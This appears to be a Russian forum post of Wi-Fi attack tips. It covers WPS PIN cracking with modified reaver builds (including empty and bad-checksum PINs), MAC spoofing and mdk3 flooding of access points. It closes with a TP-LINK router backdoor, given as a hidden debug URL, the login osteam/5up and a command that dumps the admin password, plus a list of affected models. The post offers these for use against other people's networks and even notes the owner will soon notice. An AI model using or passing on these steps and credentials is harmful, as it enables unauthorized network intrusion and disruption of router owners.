В Wifislax есть несколько модификаций reaver, том числе "reavermod".

Это патченная версия предназначена для pin с кривой чек-суммой.

Тоесть любой другой ривер автоматически исправляет 8ю цифру (чек-сумму) на правильную и не дает вам возможности получить пасс по кривому пину.

А "reavermod" принимает 8ю цифру без правки как есть.

В help автор мода приводит пример мака 8C:0C:A3:XX:XX:XX как характерного для случая с кривой чек-суммой.

Кстати, ещё бывает случай, когда пин пустой.

Замечено на Huawei HG658c, возможно есть на других Huawei.

Ривер также не умеет получать пароль по пустому пину.

Источник, патч к риверу и как его накатить

hg658c.wordpress.com/2015/06/20/obtaining-the-wifi-password-in-a-few-seconds-using-wps/

===========================

macchanger

Если мак меняете, то меняйте сразу и wlan0 и mon0, причем на одинаковый.

Когда разные маки - reaver не видит цель.

===========================

Цитата:

mdk3 "корректно работает исключительно в BackTrack""

Цитата:

В Kali MDK3 не рабочий, он вешает клиентов с Мас адресом: 00:00:00:00:00:00

..и/или работает со скоростью 1-2 пакета в секунду (должно быть хотя бы ~500).

Режимы "x", "f" и ключ "-s" - становятся бесполезны.

Однако если юзать режим "a" и ждать 5мин(а не 5сек), то точка уязвимая к режиму "a" падает, примерно на 230 пакете(=клиенте).

===========================

1) TP-LINK

2) Ривер отработал и выдал вместо пароля WPA-PSK (64 символа)

3) Многократный запуск ривера "-p xxxxxxxx" не помогает

4) Ввели пин как пароль(QSS/Jumpstart), изменилось название сети и пароль Wi-Fi (хозяин точки скоро узнает)

5) Недефолтный пароль на админке (не можете вернуть назад как было)

Что, если сделать так...

habrahabr.ru/post/172799/#comment_6002677

http://192.168.0.1/userRpmNatDebugRpm26525557/linux_cmdline.html

user: osteam

pass: 5up

Выполняем: nvram show

В выводе должен быть пароль админа (и все остальные настройки)

Бэкдор замечен на моделях: WR743ND,WR842ND,WA-901ND,WR941N,WR941ND,WR1043ND,WR2543ND,MR3220,MR30 20,WR841N